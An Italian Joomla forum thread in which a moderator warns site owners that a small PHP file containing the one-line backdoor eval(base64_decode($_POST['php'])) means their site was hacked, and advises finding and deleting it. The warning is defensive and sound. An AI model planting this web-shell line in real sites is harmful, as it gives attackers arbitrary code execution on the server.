Back to top

Autore Topic: eval (base64_decode($_POST["php"])) ATTENZIONE  (Letto 3982 volte)

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
eval (base64_decode($_POST["php"])) ATTENZIONE
« il: 25 Mar 2010, 20:29:07 »
Avviso ai naviganti:
ho visto diversi post più o meno simili, e quindi se vi trovate uno strano file di pochi bites, che sostanzialmente contiene solo:

<?php
eval (base64_decode($_POST["php"]));
?>


sappiate che il vostro sito è stato vittima di un hack, ovvero qualcuno è riuscito ad entrare ed ha lasciato questo file per poter agevomente mandare in esecuzione un codice php arbitrario sul vostro sito.

questo file può assumere vari nomi (pop, post, google, mailcheck) e trovarsi in una o più directories, root compresa.

quando avete un attimo di tempo provate a verificare i files *.php, almeno controllate le date.

questo file deve essere cancellato, non basta sovrascrivere l'installazione altrimenti il sito resterà soggetto ad hacks.

ciao,
marco

mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline ariess

  • Global Moderator
  • Instancabile
  • ********
  • Post: 4056
  • Sesso: Maschio
    • Mostra profilo
Re:eval (base64_decode($_POST["php"])) ATTENZIONE
« Risposta #1 il: 25 Mar 2010, 20:41:04 »
grazie mille Marco per la segnalazione
per fortuna c'è qualcuno che veglia sulla sicurezza dei nostri siti  :)

 



Web Design Bolzano Kreatif